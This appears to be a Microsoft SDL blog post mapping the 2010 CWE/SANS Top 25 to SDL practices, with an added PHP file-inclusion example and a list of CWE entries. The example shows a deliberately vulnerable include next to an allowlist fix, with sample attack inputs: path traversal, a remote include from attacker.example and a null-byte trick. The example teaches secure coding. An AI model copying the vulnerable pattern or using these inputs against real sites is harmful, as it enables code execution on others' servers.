Hi, Michael here,
As you may know, a collaboration of industry experts and academics has produced the CWE/SANS Top 25 Most Dangerous Programming Errors for a second year, defining and describing the programming errors most likely to lead to serious software vulnerabilities. As we did last year, Microsoft helped define the 2010 list.
As the process drew to a close and the draft list of 40 candidates was being whittled down to 25, we decided, as we did in 2009, to see how the processes and tasks of the Security Development Lifecycle (SDL) map to the Top 25.
As we expected, the SDL maps very well to the 2010 Top 25, just as it did in 2009. Every one of the Top 25 is covered by one or more SDL requirements, and most are also covered by an automated SDL verification tool or a secure coding library. Even CWE-98, "PHP File Inclusion," is covered by the SDL through our required security training classes, which is especially remarkable when you consider that virtually no PHP code is written at Microsoft.
The reason the SDL addresses issues like PHP file inclusion is that we don't wait for a new vulnerability taxonomy to be released and then rush to bolt mitigations onto our security processes; rather, we structure the SDL to teach developers fundamentally sound, secure programming practices. As a result, we cover not just the known vulnerabilities of today (like the Top 25) but also many of the vulnerabilities that will only be discovered tomorrow. That all of the Top 25 are addressed by the SDL is a welcome validation, but it is a result of the content of our process, not its cause.
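To make the CWE-98 point concrete, here is the file-inclusion pattern beside the form that the "fundamentally sound" practice calls for: untrusted input is never used as any part of a path, only as a key into a fixed allowlist. This is an added example and not code from the original post or from Microsoft; the page names, the pages/ directory and the constructed request values are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post): the CWE-98 pattern and its
// allowlist fix. Page names and the pages/ directory are assumptions.

// VULNERABLE: the request parameter decides which file PHP executes.
//   ?page=../../../../var/tmp/upload  -> executes an attacker-written local file
//   ?page=http://attacker.example/x   -> fetches and executes remote code when
//                                        allow_url_include is On
// Appending '.php' is not a defence: an attacker who can write any local file
// (an upload directory, /tmp, a log) controls its contents regardless of name,
// and on PHP versions before 5.3.4 a %00 in the parameter truncated the path.
function vulnerable_include(string $page): void
{
    include $page . '.php';
}

// HARDENED: the parameter is only ever a key into a fixed allowlist, so no
// byte of user input reaches the filesystem or the include resolver.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null for anything not on the list.
function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

function safe_include(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Constructed request values (not real traffic) showing what each version
// would hand to include.
$samples = [
    'about',
    '../../../../var/tmp/upload',
    'http://attacker.example/shell',
    "about\0",
];
foreach ($samples as $s) {
    printf("input %s\n", json_encode($s));
    printf("  vulnerable includes: %s\n", $s . '.php');
    printf("  hardened includes:   %s\n\n", resolve_page($s) ?? '(rejected, 404)');
}
```

In the real request handler, check is_string($_GET['page'] ?? null) before calling safe_include: a request such as ?page[]=x arrives as an array, which the string type hint turns into an uncaught TypeError rather than the controlled 404 the code intends.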
The 2010 Top 25 entries as we mapped them (23 of the 25 survive in the table as reproduced here; the original table also recorded, per entry, whether a library, tool or code-generation fix applies, and that column is not reproduced):

CWE-120  Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
CWE-129  Improper Validation of Array Index
CWE-131  Incorrect Calculation of Buffer Size
CWE-805  Buffer Access with Incorrect Length Value
CWE-209  Information Exposure Through an Error Message
CWE-754  Improper Check for Exceptional Conditions
CWE-98   Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
CWE-434  Unrestricted File Upload
CWE-770  Allocation of Resources Without Limits or Throttling
CWE-78   Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
CWE-79   Failure to Preserve Web Page Structure ('Cross-site Scripting')
CWE-89   Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
CWE-352  Cross-Site Request Forgery (CSRF)
CWE-494  Download of Code Without Integrity Check
CWE-601  URL Redirection to Untrusted Site ('Open Redirect')
CWE-190  Integer Overflow or Wraparound
CWE-807  Reliance on Untrusted Inputs in a Security Decision
CWE-285  Improper Access Control (Authorization)
CWE-306  Missing Authentication for Critical Function
CWE-311  Missing Encryption of Sensitive Data
CWE-327  Use of a Broken or Risky Cryptographic Algorithm
CWE-732  Incorrect Permission Assignment for Critical Resource
CWE-798  Use of Hard-coded Credentials